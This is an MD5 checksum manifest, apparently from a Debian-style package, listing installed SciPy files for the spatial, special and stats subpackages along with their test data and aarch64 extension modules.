79b606c6beea99f46947e232a2b4d4eb  usr/lib/python3/dist-packages/scipy/spatial/kdtree.py
22c3018f357da11f8b42f82802c32ad5  usr/lib/python3/dist-packages/scipy/spatial/qhull.py
cc8167ed67015ef7052223715c1fe182  usr/lib/python3/dist-packages/scipy/spatial/qhull_src/COPYING.txt
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/spatial/tests/__init__.py
436dfe423ce1fc6caf5deb8f0f8d5c2e  usr/lib/python3/dist-packages/scipy/spatial/tests/data/cdist-X1.txt
f3bbda7949aa0bdec236801da0dce82a  usr/lib/python3/dist-packages/scipy/spatial/tests/data/cdist-X2.txt
9d042b6c1bbb3c3cc515e78535ab1927  usr/lib/python3/dist-packages/scipy/spatial/tests/data/degenerate_pointset.npz
aa0c4507fe030146f173d2675e206ca5  usr/lib/python3/dist-packages/scipy/spatial/tests/data/iris.txt
523905e068b62c6c1471c8458f8d0553  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-boolean-inp.txt
edc61f21ee0678928c79ca01908d3bee  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-chebyshev-ml-iris.txt
580709d5c62f90a6878d3ba1fca5a19c  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-chebyshev-ml.txt
aa6d15c7ad5396d752f0a347c2738f19  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-cityblock-ml-iris.txt
14c516aa24eb57aeeb1fb2983eaa8c46  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-cityblock-ml.txt
27088c7842932feb134cd6d8e2b1c24d  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-correlation-ml-iris.txt
c3b539724708090a60cf39393c34fbdb  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-correlation-ml.txt
06ea6a52a6e1a2a8cde1c03f808e575a  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-cosine-ml-iris.txt
ea91616e61a86cbd2ef46ac60d969045  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-cosine-ml.txt
7367022730d1c3efd9b8cb0b0b7e2598  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-double-inp.txt
6ae84eef1d0bf46dcf2ef70708229fa7  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-euclidean-ml-iris.txt
0b5a71b1074bc185150844df7926e5f9  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-euclidean-ml.txt
d51fb6fce92f566a27e91e865464becf  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-hamming-ml.txt
180ce4036b74ecc83e0f6c5997100c77  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-jaccard-ml.txt
7e32b0861a8f8f2399aa266fd583cc7e  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-jensenshannon-ml-iris.txt
2928c9c8e990e337a04e7b5eaa657439  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-jensenshannon-ml.txt
47f3cbec1a0c1c1a98d74525f3f388a6  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-minkowski-3.2-ml-iris.txt
3436421e80178c517500029dd93b9543  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-minkowski-3.2-ml.txt
e3388774f1f513edb61d948a3feccfc5  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-minkowski-5.8-ml-iris.txt
510c48345d9525cad69e4b293337c08d  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-seuclidean-ml-iris.txt
fe715301bfff5582d1407d2cb461376f  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-seuclidean-ml.txt
7cc0e26eec5d4ffe0a66c502f0f12f82  usr/lib/python3/dist-packages/scipy/spatial/tests/data/pdist-spearman-ml.txt
dfbb70f011c5c0ecc6ce93fcd59f8dff  usr/lib/python3/dist-packages/scipy/spatial/tests/data/random-bool-data.txt
cbb1f557f9d8a84210f094ac5f85903b  usr/lib/python3/dist-packages/scipy/spatial/tests/data/random-double-data.txt
740a53a4db92243b164ea108686fbb54  usr/lib/python3/dist-packages/scipy/spatial/tests/data/random-int-data.txt
c09558cc17ac90ce8a07fa4356dfbdf5  usr/lib/python3/dist-packages/scipy/spatial/tests/data/random-uint-data.txt
89562a5a927bc7fc4f866b9d92ec9e08  usr/lib/python3/dist-packages/scipy/spatial/tests/data/selfdual-4d-polytope.txt
d899475ab438240b98b875ac96d27151  usr/lib/python3/dist-packages/scipy/spatial/tests/test__plotutils.py
f7b5477b82be709e657c0f8995a51fa5  usr/lib/python3/dist-packages/scipy/spatial/tests/test__procrustes.py
458de39e369e22c6b44390b5cdd670a6  usr/lib/python3/dist-packages/scipy/spatial/tests/test_distance.py
123e14206372ab8fa072d360945b23ad  usr/lib/python3/dist-packages/scipy/spatial/tests/test_hausdorff.py
3b67c782ec320d1da803d15ae86942a5  usr/lib/python3/dist-packages/scipy/spatial/tests/test_kdtree.py
99950b79ca72f756aa78454c65062262  usr/lib/python3/dist-packages/scipy/spatial/tests/test_qhull.py
17f552647c2b397b7e1dec65b4d10f9d  usr/lib/python3/dist-packages/scipy/spatial/tests/test_slerp.py
bf12ad6a025aa9a3188d3d118d2b762e  usr/lib/python3/dist-packages/scipy/spatial/tests/test_spherical_voronoi.py
0641ea009e4584595c16197b7c965f61  usr/lib/python3/dist-packages/scipy/spatial/transform/__init__.py
2599d2192f7afcb82107cdbf8af8cbe2  usr/lib/python3/dist-packages/scipy/spatial/transform/_rotation.cpython-312-aarch64-linux-gnu.so
c94fba2bbfd7e579a9556542b309c34d  usr/lib/python3/dist-packages/scipy/spatial/transform/_rotation.pyi
4fce3fff7fe703c0785588f7050e9078  usr/lib/python3/dist-packages/scipy/spatial/transform/_rotation_groups.py
07dff66570cd011fa6d4c2784864da56  usr/lib/python3/dist-packages/scipy/spatial/transform/_rotation_spline.py
5596bb99b21860d504e56142d85da2d5  usr/lib/python3/dist-packages/scipy/spatial/transform/rotation.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/spatial/transform/tests/__init__.py
6fcf12454f2ba7a854d54b9d3081d307  usr/lib/python3/dist-packages/scipy/spatial/transform/tests/test_rotation.py
73d6c446672c0fb3a88e6a5d2bc424bd  usr/lib/python3/dist-packages/scipy/spatial/transform/tests/test_rotation_groups.py
7d747ccfabfbd9f199f92b914a9725d5  usr/lib/python3/dist-packages/scipy/spatial/transform/tests/test_rotation_spline.py
2b0cbb5c139461b1ede1ef831be8dec0  usr/lib/python3/dist-packages/scipy/special.pxd
1956868975ae90d619b27b0b951f6a36  usr/lib/python3/dist-packages/scipy/special/__init__.py
eeab4f0ec9c4534ab36d61cd289c65c2  usr/lib/python3/dist-packages/scipy/special/_add_newdocs.py
cab855d8a816b3f0c5393b318b13b67c  usr/lib/python3/dist-packages/scipy/special/_basic.py
d381d80f678ce820aa63a673d9188563  usr/lib/python3/dist-packages/scipy/special/_comb.cpython-312-aarch64-linux-gnu.so
d5c9f4e10861933525a55a51886cdb2a  usr/lib/python3/dist-packages/scipy/special/_ellip_harm.py
9253bfcb3e93c120bd4d1ce6d290b974  usr/lib/python3/dist-packages/scipy/special/_ellip_harm_2.cpython-312-aarch64-linux-gnu.so
f409c76d566026241c9624ae33343fe5  usr/lib/python3/dist-packages/scipy/special/_lambertw.py
3f6fa44bb840673d4ea7ef1de9760ccd  usr/lib/python3/dist-packages/scipy/special/_logsumexp.py
6ddca4a8b92a513f91c76f1777c33841  usr/lib/python3/dist-packages/scipy/special/_mptestutils.py
4beab31675f4b7cf58a9f7bd15b4747c  usr/lib/python3/dist-packages/scipy/special/_orthogonal.py
502d94779c94ada271123d89bb4c7596  usr/lib/python3/dist-packages/scipy/special/_orthogonal.pyi
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/special/_precompute/__init__.py
cd4cfee05c1e0623b6b04f1b745b9396  usr/lib/python3/dist-packages/scipy/special/_precompute/cosine_cdf.py
da2b9f610aa22c1c8249d1e46e735d89  usr/lib/python3/dist-packages/scipy/special/_precompute/expn_asy.py
4ed8c9bcd8938d2dbac1eecdca22879e  usr/lib/python3/dist-packages/scipy/special/_precompute/gammainc_asy.py
e062e9daa8d6fbf63e57507fe2c2a0b9  usr/lib/python3/dist-packages/scipy/special/_precompute/gammainc_data.py
220e3e93863856e59ad6a88c47270229  usr/lib/python3/dist-packages/scipy/special/_precompute/lambertw.py
9467ea259dd39e0d933e3d5d35a72f09  usr/lib/python3/dist-packages/scipy/special/_precompute/loggamma.py
02a78010a5ffe964991ea4ce5edee806  usr/lib/python3/dist-packages/scipy/special/_precompute/struve_convergence.py
2a3e2854418db0ecce6ef0f7eb63fb32  usr/lib/python3/dist-packages/scipy/special/_precompute/utils.py
efde929618cc053a94c5e4948fb9ebf0  usr/lib/python3/dist-packages/scipy/special/_precompute/wright_bessel.py
be82e75555b09316a2a990c7df09478d  usr/lib/python3/dist-packages/scipy/special/_precompute/wright_bessel_data.py
7f785412414323990a8fbcee1d1fab3d  usr/lib/python3/dist-packages/scipy/special/_precompute/wrightomega.py
e8c992dad11b7a4bf3366064d3e9bcef  usr/lib/python3/dist-packages/scipy/special/_precompute/zetac.py
d3b82e8db2a8533ff5798fc97b47adfc  usr/lib/python3/dist-packages/scipy/special/_sf_error.py
e0ad5531d3cc4df65d3ad96cc1b4422a  usr/lib/python3/dist-packages/scipy/special/_specfun.cpython-312-aarch64-linux-gnu.so
ed8e3473c66331d9e81fa190ebc5fc1d  usr/lib/python3/dist-packages/scipy/special/_spfun_stats.py
1eac16348eee5533d00d6b567735d756  usr/lib/python3/dist-packages/scipy/special/_spherical_bessel.py
dc5f4a64cb6bbc603a2314bb50d1d1ae  usr/lib/python3/dist-packages/scipy/special/_test_internal.cpython-312-aarch64-linux-gnu.so
3b128c7e93a5c39b6c9fb12bb94b0546  usr/lib/python3/dist-packages/scipy/special/_test_internal.pyi
3aed4cfceb2d6d447ae59b96fc1c0fca  usr/lib/python3/dist-packages/scipy/special/_testutils.py
dc1a57ce2f4751f500d4e5da18102abc  usr/lib/python3/dist-packages/scipy/special/_ufuncs.cpython-312-aarch64-linux-gnu.so
6442afefbe6b13cfe004f7ebd850864b  usr/lib/python3/dist-packages/scipy/special/_ufuncs.pyi
ee06d518914612dd8acde33b62007df3  usr/lib/python3/dist-packages/scipy/special/_ufuncs_cxx.cpython-312-aarch64-linux-gnu.so
c35254aef2820c79a738e19c52077b8e  usr/lib/python3/dist-packages/scipy/special/_ufuncs_cxx.pxd
e12e41fafa7c9d329beb931be9dc586f  usr/lib/python3/dist-packages/scipy/special/_ufuncs_cxx_defs.h
d05fc89fb1f68e31557f48a4358e90c9  usr/lib/python3/dist-packages/scipy/special/_ufuncs_defs.h
4679d2cda2230a5f3326ac72e0628df7  usr/lib/python3/dist-packages/scipy/special/add_newdocs.py
6721cfa587d64af17d30ff3be902a0dd  usr/lib/python3/dist-packages/scipy/special/basic.py
fb769afa0716cacbce2bc1bf87a72738  usr/lib/python3/dist-packages/scipy/special/cython_special.cpython-312-aarch64-linux-gnu.so
480cb263f440de808444e05fdb2b05f8  usr/lib/python3/dist-packages/scipy/special/cython_special.pxd
ca0671203ef640e39118196d5af0987c  usr/lib/python3/dist-packages/scipy/special/cython_special.pyi
cbc4a43b7defc120d34cd6e9fe1cf469  usr/lib/python3/dist-packages/scipy/special/orthogonal.py
dc0053bb128c1696279a41f99f031d72  usr/lib/python3/dist-packages/scipy/special/sf_error.py
bd6932d9dfdb6b183443f1dae9b00c78  usr/lib/python3/dist-packages/scipy/special/specfun.py
87c9ce48a0aba07d81006de03a1030d2  usr/lib/python3/dist-packages/scipy/special/spfun_stats.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/special/tests/__init__.py
f906be3a7b9b546d9f12c6ba3c0bf669  usr/lib/python3/dist-packages/scipy/special/tests/data/boost.npz
768b6095fdba740c594fc6c692f004a8  usr/lib/python3/dist-packages/scipy/special/tests/data/gsl.npz
06e54639120fc36030ff5242a7bbf559  usr/lib/python3/dist-packages/scipy/special/tests/data/local.npz
8de4881f3ca421a2dbb372b19074a33b  usr/lib/python3/dist-packages/scipy/special/tests/test_basic.py
03fb6b0f5c848b43104310e74a79bfed  usr/lib/python3/dist-packages/scipy/special/tests/test_bdtr.py
ee8d225370e0dd7ddb1a9fcc116b1e5a  usr/lib/python3/dist-packages/scipy/special/tests/test_boxcox.py
961513c791bb3888697c7b22a98ac546  usr/lib/python3/dist-packages/scipy/special/tests/test_cdflib.py
daebbdac4bb0b8dc4b78932877eef2f5  usr/lib/python3/dist-packages/scipy/special/tests/test_cdft_asymptotic.py
22a13ca3388765541c2f19b1441eb2d4  usr/lib/python3/dist-packages/scipy/special/tests/test_cosine_distr.py
107b7ea83799bf4c0f5b7e0292e8df0a  usr/lib/python3/dist-packages/scipy/special/tests/test_cython_special.py
d2981c8078068fd1ee3440b2f4118d3f  usr/lib/python3/dist-packages/scipy/special/tests/test_data.py
1133f8046e9a6f9158887ec1376bba02  usr/lib/python3/dist-packages/scipy/special/tests/test_dd.py
e4806a9d2c8ba6665c21aa42e1b1e026  usr/lib/python3/dist-packages/scipy/special/tests/test_digamma.py
878f025b3db5e10ecb6ca364703495ca  usr/lib/python3/dist-packages/scipy/special/tests/test_ellip_harm.py
b12d2b13d59358ca309c2f60969664d0  usr/lib/python3/dist-packages/scipy/special/tests/test_erfinv.py
9411e58a094475883a19c382946595e6  usr/lib/python3/dist-packages/scipy/special/tests/test_exponential_integrals.py
90d916d8706db638423381faca9e41c4  usr/lib/python3/dist-packages/scipy/special/tests/test_faddeeva.py
00219cecc9e405a75661db9a60bd5e29  usr/lib/python3/dist-packages/scipy/special/tests/test_gamma.py
5193ccf53bf256bafe601d26f03639e4  usr/lib/python3/dist-packages/scipy/special/tests/test_gammainc.py
300f2d926e8db944bd063ea63f94117e  usr/lib/python3/dist-packages/scipy/special/tests/test_hyp2f1.py
d68bd9d22e6cdd6489489006a9af3d90  usr/lib/python3/dist-packages/scipy/special/tests/test_hypergeometric.py
a0dfa025e17a4baaf10ca64d04c263ef  usr/lib/python3/dist-packages/scipy/special/tests/test_kolmogorov.py
b3f7f1d467eeaf5eafbd3387aea6ea8e  usr/lib/python3/dist-packages/scipy/special/tests/test_lambertw.py
6189bd4211702235a1bf63519ee08074  usr/lib/python3/dist-packages/scipy/special/tests/test_log_softmax.py
5e62fee54b110e6f468a708f099116a3  usr/lib/python3/dist-packages/scipy/special/tests/test_loggamma.py
75fdc16594e43b81ea39367fc5863c21  usr/lib/python3/dist-packages/scipy/special/tests/test_logit.py
585f0f1d0bee29e94e60be72bb52d1fe  usr/lib/python3/dist-packages/scipy/special/tests/test_logsumexp.py
fa4f860da12380686f9068205d16d8ed  usr/lib/python3/dist-packages/scipy/special/tests/test_mpmath.py
dc99e8e6ca8d869caa17b5c5794af607  usr/lib/python3/dist-packages/scipy/special/tests/test_nan_inputs.py
bee5dd112384df1454d795f0418d1804  usr/lib/python3/dist-packages/scipy/special/tests/test_ndtr.py
e63d290c167eb635d5f509408856b915  usr/lib/python3/dist-packages/scipy/special/tests/test_ndtri_exp.py
c7c13dd336820ca0c7acc6f4c2f3787e  usr/lib/python3/dist-packages/scipy/special/tests/test_orthogonal.py
c622bde7fbc3398cf779d8baef5f9c89  usr/lib/python3/dist-packages/scipy/special/tests/test_orthogonal_eval.py
27d69d35aaa9724801435d95bbecda97  usr/lib/python3/dist-packages/scipy/special/tests/test_owens_t.py
48ccafb78089a95e26477acfe878ca47  usr/lib/python3/dist-packages/scipy/special/tests/test_pcf.py
4b1708cffcdd2e7cdde8e0133d586f85  usr/lib/python3/dist-packages/scipy/special/tests/test_pdtr.py
e42c0026d4c2944c156d8601fa5d96cb  usr/lib/python3/dist-packages/scipy/special/tests/test_powm1.py
3374b37ef48b8e6449ec21909b42f6d7  usr/lib/python3/dist-packages/scipy/special/tests/test_precompute_expn_asy.py
01a07f8da1bdad8a4907593a16e421ed  usr/lib/python3/dist-packages/scipy/special/tests/test_precompute_gammainc.py
ba282313158030ca8115d726b74a9453  usr/lib/python3/dist-packages/scipy/special/tests/test_precompute_utils.py
48a6d37671525d4db90544de38aaea0c  usr/lib/python3/dist-packages/scipy/special/tests/test_round.py
31ed7f06eb7239e8c157a270285e0209  usr/lib/python3/dist-packages/scipy/special/tests/test_sf_error.py
c64184d007f80ae850f507466cdd3b39  usr/lib/python3/dist-packages/scipy/special/tests/test_sici.py
b42909190fea44e80a35a5261a83883e  usr/lib/python3/dist-packages/scipy/special/tests/test_spence.py
5672a4ddec9c2df0ec78d75a747dbe2d  usr/lib/python3/dist-packages/scipy/special/tests/test_spfun_stats.py
83abca7e0b8f013c62df5cf64270e222  usr/lib/python3/dist-packages/scipy/special/tests/test_sph_harm.py
5f52b94a4d326ae3c78e9954c764e7bb  usr/lib/python3/dist-packages/scipy/special/tests/test_spherical_bessel.py
df0ddad3a4c8d6af64786d34c09f5ae7  usr/lib/python3/dist-packages/scipy/special/tests/test_trig.py
509c439e01e942fc6f1980544ff23c99  usr/lib/python3/dist-packages/scipy/special/tests/test_wright_bessel.py
b3d916f4e15e6f67ccff5558ac9a8da7  usr/lib/python3/dist-packages/scipy/special/tests/test_wrightomega.py
554ac6193721cc16850f4ea5769ba319  usr/lib/python3/dist-packages/scipy/special/tests/test_zeta.py
da787712a33a039b1d109fdc077f3ed3  usr/lib/python3/dist-packages/scipy/stats/__init__.py
d2fda60f009c3760741606021d08437e  usr/lib/python3/dist-packages/scipy/stats/_axis_nan_policy.py
3fc25b76e0f7eeac607d61c55ae12da9  usr/lib/python3/dist-packages/scipy/stats/_biasedurn.cpython-312-aarch64-linux-gnu.so
5a7bb1adb4f6dda39ea71b7cdd1c9a2c  usr/lib/python3/dist-packages/scipy/stats/_biasedurn.pxd
2db0a2543c045fdd468538254dcd9248  usr/lib/python3/dist-packages/scipy/stats/_binned_statistic.py
ac62d874cecb7c10e10eaeca473da352  usr/lib/python3/dist-packages/scipy/stats/_binomtest.py
45df5fb0e475f6db8ed9f8b8fcf84ba4  usr/lib/python3/dist-packages/scipy/stats/_boost/__init__.py
b62d7a741158d93249d0e45e0cd8f193  usr/lib/python3/dist-packages/scipy/stats/_boost/beta_ufunc.cpython-312-aarch64-linux-gnu.so
98fd7352e900239295284a4575fb3075  usr/lib/python3/dist-packages/scipy/stats/_boost/binom_ufunc.cpython-312-aarch64-linux-gnu.so
c6b368164e0366d6c49b54b2b698d1cb  usr/lib/python3/dist-packages/scipy/stats/_boost/hypergeom_ufunc.cpython-312-aarch64-linux-gnu.so
0d325d77fec17f628649f6c497fc7cc6  usr/lib/python3/dist-packages/scipy/stats/_boost/invgauss_ufunc.cpython-312-aarch64-linux-gnu.so
00854a95e48edc453d577fa803ef7aa2  usr/lib/python3/dist-packages/scipy/stats/_boost/nbinom_ufunc.cpython-312-aarch64-linux-gnu.so
6ecb00611cfec62cb6c2f1147245907a  usr/lib/python3/dist-packages/scipy/stats/_boost/ncf_ufunc.cpython-312-aarch64-linux-gnu.so
5d444a8273c0415f861b06794eb207a1  usr/lib/python3/dist-packages/scipy/stats/_boost/nct_ufunc.cpython-312-aarch64-linux-gnu.so
4e978ce3c424bad39d4b5f92927e7013  usr/lib/python3/dist-packages/scipy/stats/_boost/ncx2_ufunc.cpython-312-aarch64-linux-gnu.so
5c433b7fdfe36ce2054b9a74f9fc3446  usr/lib/python3/dist-packages/scipy/stats/_boost/skewnorm_ufunc.cpython-312-aarch64-linux-gnu.so
022cee3988df7dd4ad0dde952cc01586  usr/lib/python3/dist-packages/scipy/stats/_censored_data.py
b2e35253d8f32a36bc77e1d9b7465e15  usr/lib/python3/dist-packages/scipy/stats/_common.py
6a69e4232745f802e61d1b7ddcde6a4f  usr/lib/python3/dist-packages/scipy/stats/_constants.py
48ca367b7de87fde089053d471d2d7b9  usr/lib/python3/dist-packages/scipy/stats/_continuous_distns.py
43ac8ceca9dad44b2a3937d06112f9c3  usr/lib/python3/dist-packages/scipy/stats/_covariance.py
3347ee40f4015c0e61e0d7d30bc5317c  usr/lib/python3/dist-packages/scipy/stats/_crosstab.py
9de3783ef72ce5b6601b57033847e93f  usr/lib/python3/dist-packages/scipy/stats/_discrete_distns.py
963e47f18cf433e22fc861cf9a481af7  usr/lib/python3/dist-packages/scipy/stats/_distn_infrastructure.py
511d4de7905c2ba2b7ef5423c594fd2b  usr/lib/python3/dist-packages/scipy/stats/_distr_params.py
4cfd70413ed38f6e12584afbb46e4a48  usr/lib/python3/dist-packages/scipy/stats/_entropy.py
366f896b48d6dfbaecc1acba34c744ce  usr/lib/python3/dist-packages/scipy/stats/_fit.py
79757c24b24c23c0ee6729d4a9bb913b  usr/lib/python3/dist-packages/scipy/stats/_generate_pyx.py
ad5f5054e1bededba7a05f7c267065d3  usr/lib/python3/dist-packages/scipy/stats/_hypotests.py
ccf1e02f2afbe5268def2f0e431e43a3  usr/lib/python3/dist-packages/scipy/stats/_kde.py
dd4df3e3315a25acbdca73cc25d9f155  usr/lib/python3/dist-packages/scipy/stats/_ksstats.py
e933fb6d8052ea4441b779435f741c58  usr/lib/python3/dist-packages/scipy/stats/_levy_stable/__init__.py
860bdbf26dc7f62c30b68df340f54483  usr/lib/python3/dist-packages/scipy/stats/_levy_stable/levyst.cpython-312-aarch64-linux-gnu.so
e5acbeceabacf5f797b7b632a544a54f  usr/lib/python3/dist-packages/scipy/stats/_mannwhitneyu.py
86a8f6f602cc9851c393dbb9473dcec3  usr/lib/python3/dist-packages/scipy/stats/_morestats.py
6e3d97a382a331abe3779338f0017dc9  usr/lib/python3/dist-packages/scipy/stats/_mstats_basic.py
53dec9cabf57100f294f08e5f9ba225f  usr/lib/python3/dist-packages/scipy/stats/_mstats_extras.py
5be8d99582ce8ebe83997ddeb825cd25  usr/lib/python3/dist-packages/scipy/stats/_multicomp.py
b4a4c4083923015eda24288b0fcd0a9c  usr/lib/python3/dist-packages/scipy/stats/_multivariate.py
ede1a969124135ab01c4eb697aa0291b  usr/lib/python3/dist-packages/scipy/stats/_mvn.cpython-312-aarch64-linux-gnu.so
926cc6a36ed0506f8fa51330307d1246  usr/lib/python3/dist-packages/scipy/stats/_odds_ratio.py
37037d87e920ca5fe3ee227bea089758  usr/lib/python3/dist-packages/scipy/stats/_page_trend_test.py
45cfc7f8ae2c710eef70d4ab8a91a271  usr/lib/python3/dist-packages/scipy/stats/_qmc.py
8eba61cd04ec42f0ae4503767c39d351  usr/lib/python3/dist-packages/scipy/stats/_qmc_cy.cpython-312-aarch64-linux-gnu.so
e6f7ba694311f917a40363361563e9c4  usr/lib/python3/dist-packages/scipy/stats/_qmc_cy.pyi
1f07869fd5ef10350f99953f8bf07722  usr/lib/python3/dist-packages/scipy/stats/_qmvnt.py
7f125254a245ea16c24f87f7567585c5  usr/lib/python3/dist-packages/scipy/stats/_rcont/__init__.py
e1fe0604506d8422dad3c38dae0c226d  usr/lib/python3/dist-packages/scipy/stats/_rcont/rcont.cpython-312-aarch64-linux-gnu.so
c0ca1d6ed70f00a6631b687de5d4acaa  usr/lib/python3/dist-packages/scipy/stats/_relative_risk.py
0697817bf91b7eea59dd4c7403ef21b2  usr/lib/python3/dist-packages/scipy/stats/_resampling.py
2fbcb57f501fa6eacb09bc1bd672b2fa  usr/lib/python3/dist-packages/scipy/stats/_result_classes.py
2c41e64ea47746bc4fcb443d4893813e  usr/lib/python3/dist-packages/scipy/stats/_rvs_sampling.py
fb22f6b068623d6bb8cce1c22e48ad02  usr/lib/python3/dist-packages/scipy/stats/_sensitivity_analysis.py
97f082b2140eaa4d0589ef734d30c17c  usr/lib/python3/dist-packages/scipy/stats/_sobol.cpython-312-aarch64-linux-gnu.so
75307d3d98b176366a9379e854f88124  usr/lib/python3/dist-packages/scipy/stats/_sobol.pyi
3468288432e2684a104ac6ec5dbc0ba7  usr/lib/python3/dist-packages/scipy/stats/_sobol_direction_numbers.npz
f97637619faf15ddd94fb8de7b1a2b82  usr/lib/python3/dist-packages/scipy/stats/_statlib.cpython-312-aarch64-linux-gnu.so
5eef761180399cae88fcc7d9eeb26303  usr/lib/python3/dist-packages/scipy/stats/_stats.cpython-312-aarch64-linux-gnu.so
b56b58108b9d98beb290eb937bca3458  usr/lib/python3/dist-packages/scipy/stats/_stats.pxd
81aa0e892416222a083da180febb7367  usr/lib/python3/dist-packages/scipy/stats/_stats_mstats_common.py
a9c21899d37eaaaab6662d889ed070f2  usr/lib/python3/dist-packages/scipy/stats/_stats_py.py
257e4d8f7906da868af29f7979183597  usr/lib/python3/dist-packages/scipy/stats/_stats_pythran.cpython-312-aarch64-linux-gnu.so
315789636d7afb3e182bbe9c624e0f61  usr/lib/python3/dist-packages/scipy/stats/_survival.py
e840bbeb1ef6c33572ff8977a22b446e  usr/lib/python3/dist-packages/scipy/stats/_tukeylambda_stats.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/stats/_unuran/__init__.py
21fdb5624a6c0a7569573ab90d733807  usr/lib/python3/dist-packages/scipy/stats/_unuran/unuran.pxd
0a37cbddf0f44f11ce99d457987111c3  usr/lib/python3/dist-packages/scipy/stats/_unuran/unuran_wrapper.cpython-312-aarch64-linux-gnu.so
d1cfa55f697d82e97b9a719875b9f6ad  usr/lib/python3/dist-packages/scipy/stats/_unuran/unuran_wrapper.pyi
caf358e42db3921446b30cf68d9a7e56  usr/lib/python3/dist-packages/scipy/stats/_variation.py
4fbe00fb358982b8c0e5e449bfe9412d  usr/lib/python3/dist-packages/scipy/stats/_warnings_errors.py
4480c56267ffbe40c59fc2db14ab0ca3  usr/lib/python3/dist-packages/scipy/stats/biasedurn.py
62c9883d87fe8aeb2c07a622132c29c7  usr/lib/python3/dist-packages/scipy/stats/contingency.py
5623eef1f004714e1191215dea83f709  usr/lib/python3/dist-packages/scipy/stats/distributions.py
7e9d54988fbb7c5a4e27f1e17a56c5e7  usr/lib/python3/dist-packages/scipy/stats/kde.py
2279417a93ee9bc6f8fde4b770cd8dc5  usr/lib/python3/dist-packages/scipy/stats/morestats.py
e1ecc378253c0034b1589123d4079a5f  usr/lib/python3/dist-packages/scipy/stats/mstats.py
de40887553fc4e60b23f811695331393  usr/lib/python3/dist-packages/scipy/stats/mstats_basic.py
e572ed9bb0e7ab65b52479c76fde11e0  usr/lib/python3/dist-packages/scipy/stats/mstats_extras.py
b38d70ed12579e62dfbfcfa1f608d2ef  usr/lib/python3/dist-packages/scipy/stats/mvn.py
cead5a37bcb4a72b81d124e305dd1499  usr/lib/python3/dist-packages/scipy/stats/qmc.py
56f93bdfbf08acefd76bcf17920496d7  usr/lib/python3/dist-packages/scipy/stats/sampling.py
1997621759e48a09ee4931bcc2559255  usr/lib/python3/dist-packages/scipy/stats/statlib.py
a0467e06f449391194cc7b1da1765145  usr/lib/python3/dist-packages/scipy/stats/stats.py
d41d8cd98f00b204e9800998ecf8427e  usr/lib/python3/dist-packages/scipy/stats/tests/__init__.py
dac5cdfe524b7e58927a013f1959098a  usr/lib/python3/dist-packages/scipy/stats/tests/common_tests.py
bf7ecfbf5762fe21054e42af0eeb56b0  usr/lib/python3/dist-packages/scipy/stats/tests/data/_mvt.py
2d0bdfeaa915dcdf80fba2351968cf46  usr/lib/python3/dist-packages/scipy/stats/tests/data/fisher_exact_results_from_r.py
46174ef40558ac16af1171d6262083ea  usr/lib/python3/dist-packages/scipy/stats/tests/data/levy_stable/stable-Z1-cdf-sample-data.npy
dd5a8dfd1d9877a46305c97094b07a47  usr/lib/python3/dist-packages/scipy/stats/tests/data/levy_stable/stable-Z1-pdf-sample-data.npy
995e0f1169812c45c101c8b54500d52c  usr/lib/python3/dist-packages/scipy/stats/tests/data/levy_stable/stable-loc-scale-sample-data.npy
b015e4622e10282f27dded551391348c  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/AtmWtAg.dat
da0230c72149c89610ffd7c4ccae0e4c  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SiRstv.dat
d6689664c4cdeabbe17b284cd3b07a51  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs01.dat
2889b7f0c99ff8b779329471830516cf  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs02.dat
a0472cc475d3d4ddeb72d33a0b2be41d  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs03.dat
f2a73f79a96639932513bbeda6b6e5cc  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs04.dat
eac109ec9f8eb72feeeecadaab8265c8  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs05.dat
0450215b16d36e390cd86fa3641bd8d8  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs06.dat
4dea00b2ed6ea9269f20333fa5105d4a  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs07.dat
6b23a0117e11195fe551612bed45209e  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs08.dat
769e744da33a361360e906b61dc7f932  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_anova/SmLs09.dat
91d467788ebf5db6ad3a7f2b072bfbd5  usr/lib/python3/dist-packages/scipy/stats/tests/data/nist_linregress/Norris.dat
aaa40f18e074e55c77c6511acd56686a  usr/lib/python3/dist-packages/scipy/stats/tests/data/rel_breitwigner_pdf_sample_data_ROOT.npy
d8cb3b28968a110bed79ed5ee63f1c9f  usr/lib/python3/dist-packages/scipy/stats/tests/data/studentized_range_mpmath_ref.json
